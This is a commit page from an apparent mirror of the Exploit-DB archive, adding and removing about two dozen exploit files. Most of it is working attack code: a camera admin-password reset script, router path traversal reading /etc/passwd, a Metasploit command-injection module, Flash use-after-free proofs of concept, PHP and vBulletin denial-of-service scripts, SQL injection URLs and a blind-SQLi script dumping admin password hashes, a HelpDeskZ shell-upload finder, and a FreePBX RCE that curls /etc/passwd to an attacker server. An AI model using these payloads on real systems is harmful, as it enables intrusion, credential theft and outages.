bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-08-30

Browse source 
18 new exploits

Too many to list!
This commit is contained in:
Offensive Security 2016-08-30 05:08:40 +00:00
parent 4011b4f053
commit 760d823bc8
26 changed files with 2351 additions and 1558 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2356
files.csv
View file

File diff suppressed because it is too large Load diff

46
platforms/cgi/webapps/40303.sh Executable file
View file

@ -0,0 +1,46 @@
#!/bin/bash
#
# INTELLINET IP Camera INT-L100M20N remote change admin user/password
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " [ INTELLINET IP Camera INT-L100M20N remote change admin user/password"
echo " [ ==="
echo " [ Usage: $0 <target> <user> <password>"
echo " [ Example: $0 192.168.1.200:80 admin teflon"
echo " [ ==="
echo " [ Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " [ Website: http://www.ethical-hacker.org/"
echo " [ Facebook: https://www.facebook.com/ethicalhackerorg "
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " [ Error : libwww-perl not found =/"
exit;
fi
GET -H "Cookie: frame_rate=8; expansion=10; mode=43; user_id=guest; user_auth_level=43; behind_firewall=0" "http://$1/userconfigsubmit.cgi?adminid=$2&adpasswd=$3&repasswd=$3&user1=guest&userpw1=1337&repasswd1=1337&max_frame_user1=8&authority1=41&user2=&userpw2=&repasswd2=&max_frame_user2=6&authority2=40&user3=&userpw3=&repasswd3=&max_frame_user3=6&authority3=40&user4=&userpw4=&repasswd4=&max_frame_user4=6&authority4=40&user5=&userpw5=&repasswd5=&max_frame_user5=6&authority5=40&submit=submit" 0&> /dev/null <&1

35
platforms/cgi/webapps/40304.txt Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
# Date: 28/08/2016
# Exploit Author: Rahul Raz
# Affected Model : GPN2.4P21-C-CN(Frimware- W2001EN-00
#Vendor: ChinaMobile
# Tested on: Ubuntu Linux
_____________________________________________________
GET
/cgi-bin/webproc?getpage=../../../etc/passwd&var:language=en_us&var:menu=setup&var:page=connected
Host: 192.168.59.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101
Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=64857d81
Connection: keep-alive
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: sessionid=64857d81; expires=Fri, 31-Dec-9999 23:59:59 GMT;
path=/
#root:x:0:0:root:/root:/bin/bash
#root:x:0:0:root:/root:/bin/sh
#root:x:0:0:root:/root:/usr/bin/cmd
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh

117
platforms/hardware/remote/18068.rb
View file

@ -1,117 +0,0 @@
##
# $Id: lifesize_room.rb 14143 2011-11-02 19:40:05Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'LifeSize Room Command Injection',
'Description' => %q{
This module exploits a vulnerable resource in LifeSize
Room versions 3.5.3 and 4.7.18 to inject OS commmands. LifeSize
Room is an appliance and thus the environment is limited
resulting in a small set of payload options.
},
'Author' =>
[
# SecureState R&D Team - Special Thanks To Chris Murrey
'Spencer McIntyre',
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 14143 $',
'References' =>
[
[ 'CVE', '2011-2763' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 65535, # limited by the two byte size in the AMF encoding
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp',
}
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [ [ 'Automatic', { } ] ],
'DisclosureDate' => 'Jul 13 2011',
'DefaultTarget' => 0))
end
def exploit
print_status("Requesting PHP Session...")
res = send_request_cgi({
'encode' => false,
'uri' => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}",
'method' => 'GET',
}, 10)
if not res.headers['set-cookie']
print_error('Could Not Obtain A Session ID')
return
end
sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0]
headers = {
'Cookie' => sessionid,
'Content-Type' => 'application/x-amf',
}
print_status("Validating PHP Session...")
data = "\x00\x00\x00\x00\x00\x02\x00\x1b"
data << "LSRoom_Remoting.amfphpLogin"
data << "\x00\x02/1\x00\x00\x00"
data << "\x05\x0a\x00\x00\x00\x00\x00\x17"
data << "LSRoom_Remoting.getHost"
data << "\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00"
res = send_request_cgi({
'encode' => false,
'uri' => '/gateway.php',
'data' => data,
'method' => 'POST',
'headers' => headers,
}, 10)
if not res
print_error('Could Not Validate The Session ID')
return
end
print_status("Sending Malicious POST Request...")
# This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand
amf_data = "\x00\x00\x00\x00\x00\x01\x00\x19"
amf_data << "LSRoom_Remoting.doCommand"
amf_data << "\x00\x02\x2f\x37\xff\xff\xff\xff"
amf_data << "\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}"
amf_data << "\x02\x00\x0dupgradeStatus"
res = send_request_cgi({
'encode' => false,
'uri' => '/gateway.php?' << sessionid,
'data' => amf_data,
'method' => 'POST',
'headers' => headers
}, 10)
end
end

4
platforms/linux/remote/40232.py
View file

@ -1,4 +1,4 @@
#!/usr/bin/env python
#!/usr/bin/env python
# -*- coding, latin-1 -*- ######################################################
# #
# DESCRIPTION #
@ -467,4 +467,4 @@ if __name__ == '__main__':
time.sleep(0.01)
sys.exit(1)
#EOF
#EOF

24
platforms/multiple/dos/40307.txt Executable file
View file

@ -0,0 +1,24 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=841
There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs.
A minimal PoC follows:
var mc = this.createEmptyMovieClip( "mc", 1);
var f = Selection.setFocus;
mc.f = f;
mc.f({toString : func});
function func(){
mc.removeMovieClip();
// Fix heap here
}
A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40307.zip

26
platforms/multiple/dos/40308.txt Executable file
View file

@ -0,0 +1,26 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=838
There is a use-after-free in the Stage.align property setter. When the setter is called, the parameter is converted to a string early, as a part of the new use-after-free prevention changes. This conversion can invoke script, which if the this object is a MovieClip, can delete the object, deleting the thread the call is made from, which can lead to a use-after-free.
A proof-of-concept is as follows:
this.createEmptyMovieClip("mc", 2);
var o = { toString : f };
mc.func = ASnative(666, 4); //Stage.align setter
mc.func(o);
function f(){
trace("here");
mc.removeMovieClip();
for(var i = 0; i < 100; i++){
var t = new TextFormat(); // fill up the slots
}
}
A fla and swf are attached. The swf crashes in Chrome for Windows.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40308.zip

29
platforms/multiple/dos/40309.txt Executable file
View file

@ -0,0 +1,29 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=842
Several methods in flash return instances of the Rectangle class. There is a use-after-free in creating these objects for return. If the this object of the call is a MovieClip, the Rectangle instantiation will run on its thread. If a getter is added to this class's package, it will be invoked when fetching the rectangle constructor, which can free the method's thread, which will cause the Rectangle constructor to run on a thread which has been freed. A minimal PoC is at follows:
var mc = this.createEmptyMovieClip( "mc", 1);
mc.scrollRect = {x : 0, y : 0, height : 10, width : 10}
var r = flash.geom.Rectangle;
var g = flash.geom;
g.addProperty("Rectangle", func, func);
var f = ASnative(900, 405); //scrollRect
mc.f = f;
mc.f();
function func(){
mc.removeMovieClip();
// fix heap
return r;
}
A PoC and swf are attached. The PoC crashes in Chrome on 64-bit Windows.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40309.zip

22
platforms/multiple/dos/40310.txt Executable file
View file

@ -0,0 +1,22 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=843
There is a use-after-free in BitmapData.copyPixels. If the method is called on a MovieClip, and the MovieClip is deleted during parameter conversions, it is used to convert future parameters, even though it has already been freed. A minimal proof-of-concept follows:
var mc = this.createEmptyMovieClip( "mc", 1);
var b = new flash.display.BitmapData(10, 10, true, 7);
var f = b.copyPixels;
mc.f = f;
mc.f( {}, { x : { valueOf : func}, y : 0, width : 10, height : 10 }, { x : 0, y :0 }, "natalie", { x : 0, y : 0});
function func(){
mc.removeMovieClip();
// Fix the heap
}
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40310.zip

21
platforms/multiple/dos/40311.txt Executable file
View file

@ -0,0 +1,21 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=844
There is a use-after-free in the MovieClip Transform getter. If the Transform constructor is replaced with a getter using addProperty, this getter can free the MovieClip before it is accessed. A minimal PoC is as follows:
var mc = this.createEmptyMovieClip( "mc", 1);
var tf = flash.geom.Transform;
var g = flash.geom;
g.addProperty("Transform", func, func);
mc.f = ASnative(900, 419);
mc.f();
function func(){
mc.removeMovieClip();
// Fix heap
}
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40311.zip

44
platforms/php/dos/12186.pl
View file

@ -1,44 +0,0 @@
# DOS Vbulletin 92% Works ;)
#
# Tested on all versions! and can DOS the server
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$user="vb".$rand.$i;
$data = "s="
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 /\n\n";
exit();
};

15
platforms/php/dos/40301.php Executable file
View file

@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 domxml_open_file() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
$str = str_repeat('A', 9999);
domxml_open_file($str);
?>

21
platforms/php/dos/40302.php Executable file
View file

@ -0,0 +1,21 @@
<?php
#############################################################################
## PHP 7.0 Object Cloning Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class MyCloneableClass
{
public $obj;
function __clone()
{
$this->obj = clone $this;
return $this->obj;
}
}
$obj = new MyCloneableClass();
$obj2 = clone $obj;
?>

15
platforms/php/dos/40305.txt Executable file
View file

@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 simplexml_load_file() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
$str = str_repeat('A', 9999);
simplexml_load_file($str);
?>

15
platforms/php/dos/40306.php Executable file
View file

@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 xmldocfile() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
$str = str_repeat('A', 9999);
xmldocfile($str);
?>

42
platforms/php/webapps/10401.txt
View file

@ -1,42 +0,0 @@
###############################################################
##############################################################
##
## SQL Injection Vulnerability ( download.php cat_id )
##
## iDesk
##
##
##
###############################################################
###############################################################
##
## AuTh0r : Manas58
##
## H0ME : www.1923turk.biz
##
##
##
########################
########################
##
## [ Exploit ]
##
## download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
## http://www.site.com/download.php?cat_id=sql
##
##
## [DEMO ]
## http://server/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
########################
########################
#########################################################################################################
#########################################################################################################
:: BAYBORA :: Tiamo :: Delibey ::
#########################################################################################################
#########################################################################################################

9
platforms/php/webapps/34139.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/40834/info
Yamamah Photo Gallery is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Yamamah 1.00 is vulnerable; other versions may also be affected.
http://www.example.com/themes/default/download.php?dfownload=../../includes/config.inc.php

7
platforms/php/webapps/35361.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/46457/info
Escort Directory CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/main/HotBrunette,-3+union+select+1,2,version(),4,5,6,7--+

136
platforms/php/webapps/40296.txt Executable file
View file

@ -0,0 +1,136 @@
Vulnerable software : Freepbx
Tested version : 13.0.35
vendor : freepbx.org
Author : Ahmed sultan (0x4148)
Email : 0x4148@gmail.com
Summary :
FreePBX is a web-based open source GUI (graphical user interface) that controls and manages Asterisk (PBX), an open source communication server,
With over 1 MILLION production systems worldwide and 20,000 new systems installed monthly,
the FreePBX community continues to out-perform the industry's commercial efforts.
The FreePBX EcoSystem has developed over the past decade to be the most widely deployed open source PBX platform in use across the world.
Vulnerability details :
Freepbx suffer from (Authenticated) remote code execution flaw
Boring technical stuff
File : functions.inc.php
function get_headers_assoc($url) {
global $amp_conf;
if ($amp_conf['MODULEADMINWGET']) {
FreePBX::Curl()->setEnvVariables();
exec("wget --spider --server-response -q ".$url." 2>&1", $wgetout, $exitstatus);
$headers = array();
if($exitstatus == 0 && !empty($wgetout)) {
foreach($wgetout as $value) {
$ar = explode(':', $value);
$key = trim($ar[0]);
if(isset($ar[1])) {
$value = trim($ar[1]);
$headers[strtolower($key)] = trim($value);
}
the $url is not being sanitized before being passed to the 'exec' function which lead to Command execution flaw
The function is being called at
File : libraries/modulefunctions.class.php
Line 1539 : function handledownload($module_location, $progress_callback = null) {
...................................................
// invoke progress callback
if (!is_array($progress_callback) && function_exists($progress_callback)) {
$progress_callback('getinfo', array('module'=>$modulename));
} else if(is_array($progress_callback) && method_exists($progress_callback[0],$progress_callback[1])) {
$progress_callback[0]->$progress_callback[1]('getinfo', array('module'=>$modulename));
}
$file = basename($module_location);
$filename = $amp_conf['AMPWEBROOT']."/admin/modules/_cache/".$file;
// Check each URL until get_headers_assoc() returns something intelligible. We then use
// that URL and hope the file is there, we won't check others.
-=>>>>>> $headers = get_headers_assoc($module_location);
if (empty($headers)) {
return array(sprintf(_('Failed download module tarball from %s, server may be down'),$module_location));
}
the handledownload function is called via the admin panel whenever the page.modules.php file is included
which can be basically done using admin/config.php?display=modules
File : page.modules.php
Line 174 : switch ($action) {
..............................
Line 643 : case 'upload':
..............................
Line 658 : $displayvars['processed'] = false;
if (isset($_REQUEST['upload']) && isset($_FILES['uploadmod']) && !empty($_FILES['uploadmod']['name'])) {
$displayvars['res'] = $modulef->handleupload($_FILES['uploadmod']);
$displayvars['processed'] = true;
} elseif (isset($_REQUEST['download']) && !empty($_REQUEST['remotemod'])) {
$displayvars['res'] = $modulef->handledownload($_REQUEST['remotemod']);
$displayvars['processed'] = true;
} elseif(isset($_REQUEST['remotemod'])) {
$displayvars['res'][] = 'Nothing to download or upload';
$displayvars['processed'] = true;
}
the 'remotemod' parameter is passed to exec function without being sanitized , which lead to the mentioned flaw
POC
On attacker's side run nc -lvp 8080
on target's side loginto the panel and then browse to
http://TARGET/admin/config.php?display=modules&action=upload&download=0x4148&remotemod=http://127.0.0.1/junk%26x=$(cat /etc/passwd);curl -d "$x" http://Attacker_server:8080/0x4148.jnk
Result
[0x4148:/lab]# nc -lvp 8080
listening on [any] 8080 ...
DNS fwd/rev mismatch: x.x.x.x != xxxxxx.com
connect to [ATTACKER] from x.x.x.x.x [Target] 45934
POST //0x4148.jnk HTTP/1.1
User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.16.2.3 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2
Host: ATTACKER:8080
Accept: */*
Content-Length: 1391
Content-Type: application/x-www-form-urlencoded
Expect: 100-continue
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
asterisk:x:499:498::/home/asterisk:/bin/bash
radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:497:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
prosody:x:496:495::/var/lib/prosody:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin

59
platforms/php/webapps/40300.py Executable file
View file

@ -0,0 +1,59 @@
'''
# Exploit Title: HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
# Google Dork: intext:"Help Desk Software by HelpDeskZ"
# Date: 2016-08-26
# Exploit Author: Lars Morgenroth - @krankoPwnz
# Vendor Homepage: http://www.helpdeskz.com/
# Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip
# Version: <= v1.0.2
# Tested on:
# CVE :
HelpDeskZ <= v1.0.2 suffers from an unauthenticated shell upload vulnerability.
The software in the default configuration allows upload for .php-Files ( ?!?! ). I think the developers thought it was no risk, because the filenames get "obfuscated" when they are uploaded. However, there is a weakness in the rename function of the uploaded file:
/controllers <https://github.com/evolutionscript/HelpDeskZ-1.0/tree/006662bb856e126a38f2bb76df44a2e4e3d37350/controllers>/*submit_ticket_controller.php - Line 141*
$filename = md5($_FILES['attachment']['name'].time()).".".$ext;
So by guessing the time the file was uploaded, we can get RCE.
Steps to reproduce:
http://localhost/helpdeskz/?v=submit_ticket&action=displayForm
Enter anything in the mandatory fields, attach your phpshell.php, solve the captcha and submit your ticket.
Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded:
exploit.py http://localhost/helpdeskz/ phpshell.php
'''
import hashlib
import time
import sys
import requests
print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
if len(sys.argv) < 3:
print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
sys.exit(1)
helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]
currentTime = int(time.time())
for x in range(0, 300):
plaintext = fileName + str(currentTime - x)
md5hash = hashlib.md5(plaintext).hexdigest()
url = helpdeskzBaseUrl+md5hash+'.php'
response = requests.head(url)
if response.status_code == 200:
print "found!"
print url
sys.exit(0)
print "Sorry, I did not find anything"

86
platforms/php/webapps/40312.txt Executable file
View file

@ -0,0 +1,86 @@
Vulnerable software : Freepbx
Tested version : 13.0.35
vendor : freepbx.org
Author : i-Hmx
Email : n0p1337@gmail.com
Home : sec4ever.com
Freepbx suffer from unauthenticated sql injection flaw due to insufficient sanitization of "display" parameter
File : admin/libraries/DB.class.php
public function getAll($sql,$params=array(),$fetchmode=DB_FETCHMODE_DEFAULT) {
//this is a sad workaround for people who couldn't follow documentation for functions
$fetchmode = $this->isFetchMode($params) ? $params : $fetchmode;
self::$error = null;
try {
$fetch = $this->correctFetchMode($fetchmode);
if(!empty($params) && is_array($params)) {
$this->res = $this->db->prepare($sql);
------->>>>> $this->res->execute($params);
return $this->res->fetchAll($fetch);
}
$this->res = $this->db->query($sql);
if($this->res === false) {
return false;
}
return $this->res->fetchAll($fetch);
} catch (Exception $e) {
return new DB_Error($e);
}
}
File : admin/libraries/modulefunctions.class.php
Line 593
function getinfo($module = false, $status = false, $forceload = false) {
global $amp_conf, $db;
$modules = array();
if ($module) {
// get info on only one module
$xml = $this->_readxml($module);
if (!is_null($xml)) {
$modules[$module] = $xml;
// if status is anything else, it will be updated below when we read the db
$modules[$module]['status'] = MODULE_STATUS_NOTINSTALLED;
}
// query to get just this one
---===>>>> $sql = 'SELECT * FROM modules WHERE modulename = "'.$module.'"';
}
if ($module || !$modulelist->is_loaded()) {
---===>>>$results = $db->getAll($sql,DB_FETCHMODE_ASSOC);
if(DB::IsError($results)) {
die_freepbx($sql."<br>\n".$results->getMessage());
}
File : admin/libraries/modulefunctions.legacy.php
Line 52
function module_getinfo($module = false, $status = false, $forceload = false) {
_module_backtrace();
$modulef = module_functions::create();
---===>>> return $modulef->getinfo($module, $status, $forceload);
}
File : admin/views/noaccess.php
<?php
$display = isset($_REQUEST['display'])?$_REQUEST['display']:false;
---===>>> $modinfo = \module_getinfo($display);
'display' parameter is being passed to sql execute() func without perior sanitization which lead to obvious sql injection flaw without any pre-needed authentication
POC :
Normal request
[root:/fpbx]# curl -o /dev/null -s -w "Total request time : %{time_connect} + %{time_starttransfer} = %{time_total}\n" 'http://x.x.x.x/admin/config.php?display=f4ris'
Total request time : 0.001 + 0.309 = 0.334
Sql injected
[root:/fpbx]# curl -o /dev/null -s -w "Total request time : %{time_connect} + %{time_starttransfer} = %{time_total}\n" 'http://x.x.x.x/admin/config.php?display=f4ris"XOR(if(6661=6661,sleep(0.03),0))OR"*/'
Total request time : 0.158 + 4.391 = 4.417
# Mix this with the 13.0.35 RCE one , and you are ok to get root just by echoing asterisk to the sudoers ;)
# We're still ruling the game idiots , from Eg-R1z with dust xDD
# ./f4ris

165
platforms/php/webapps/9245.pl
View file

@ -1,165 +0,0 @@
#!/usr/bin/perl
#################################################################
#################################################################
################ Original discover author banner ################
#################################################################
#################################################################
# PhpLive 3.2.1/2 (x) Blind SQL injection [_][-][X]
# _ ___ _ ___ ___ ___ _____ __ ___ __ __ ___
# | |/ / || |/ __|___ / __| _ \ __\ \ / / |_ ) \ / \/ _ \
# | ' <| __ | (_ |___| (__| / _| \ \/\/ / / / () | () \_, /
# |_|\_\_||_|\___| \___|_|_\___| \_/\_/ /___\__/ \__/ /_/
#
#
# Red n'black i dress eagle on my chest.
# It's good to be an ALBANIAN Keep my head up high for that flag i die.
# Im proud to be an ALBANIAN
# ###################################################################
# Author : boom3rang
# Contact : boom3rang[at]live.com
# Greetz : H!tm@N - KHG - cHs
#
# R.I.P redc00de
# -------------------------------------------------------------------
#
# Affected software description
# Software : PhpLive
# Vendor : http://www.phplivesupport.com
# Price : Live Support Download Starts at $89.95
# Version Vuln. : v3.2.1 & v3.2.2
# -------------------------------------------------------------------
#
# [~] SQLi :
#
# http://www.TARGET.com/message_box.php?theme=&l=[USERNAME]&x=[SQLi]
# http://www.TARGET.com/request.php?l=[USERNAME]&x=[SQLi]
#
#
# [~]Google Dork :
#
# Powered by PHP Live! v3.2.1
# Powered by PHP Live! v3.2.2
# allinurl:"request.php" "deptid"
#
# -------------------------------------------------------------------
#
# [~] Table_NAME = chat_admin
# [~] Column_NAME = login - password - email - userID - name
# -------------------------------------------------------------------
#
# [~] Admin Path :
#
# http://www.TARGET.com/phplive
# -------------------------------------------------------------------
# [~] Live Demo:
#
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=1 --> True
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=2 --> False
#
# -------------------------------------------------------------------
#
# [~] ASCII
#
# /**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>100
#
# -------------------------------------------------------------------
#
# [~] Live Demo ASCII
#
# True
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>48
#
# False
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>127
#
###########################
###########################
# Modified version banner #
###########################
###########################
# Author: skys
# Contact: skysbsb[at]gmail.com
# This script uses the PhpLive Blind Sql Injection (found by boom3rang) to recover first user login and MD5 password!
# The result of this script is like:
# admin:890f37d479270aea39ae0e156bbd9001
####################
# EDIT THESE LINES #
####################
# Edit this address acording to the php live path
$address = "http://www.site.com/phplive";
###############################
# DO NOT EDIT BELOW THIS LINE #
###############################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
@site = ($address."/request.php?l=agenciawiv&x=1/**/and/**/ascii%28substring%28%28select/**/concat%28login,0x3a,password%29/**/from/**/chat_admin/**/limit/**/1,1%29,", ",1%29%29=");
$base64str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
$tudo = "";
$foundcolon = 0;
for($i=1;$i<=100;$i++) {
$found = 0;
if($foundcolon == 0) {
for($x=32;$x<=127;$x++) {
$url = $site[0].$i.$site[1].$x;
print "Testing pass index $i: character ".chr($x)."($x)\n";
$resp = query($url);
if($resp =~ m/deptid/i) {
print "Found i($i): ".chr($x)."($x)\n";
$tudo .= chr($x);
print "All: $tudo\n";
$found = 1;
if($x == 0x3a) {
$foundcolon = 1;
}
last;
}
}
} else {
for($x=0;$x<length($base64str);$x++) {
$url = $site[0].$i.$site[1].ord(substr($base64str, $x, 1));
print "Testing pass index $i: character ".ord(substr($base64str, $x, 1))."(".substr($base64str, $x, 1).")\n";
$resp = query($url);
if($resp =~ m/deptid/i) {
print "Found i($i): ".substr($base64str, $x, 1)."(".ord(substr($base64str, $x, 1)).")\n";
$tudo .= substr($base64str, $x, 1);
print "All: $tudo\n";
$found = 1;
last;
}
}
}
if($found == 0) {
print "Not found char index $i! End of md5 hash? :-)\n";
last;
}
}
print "login:md5: $tudo\n";
exit;
sub query() {
$link = $_[0];
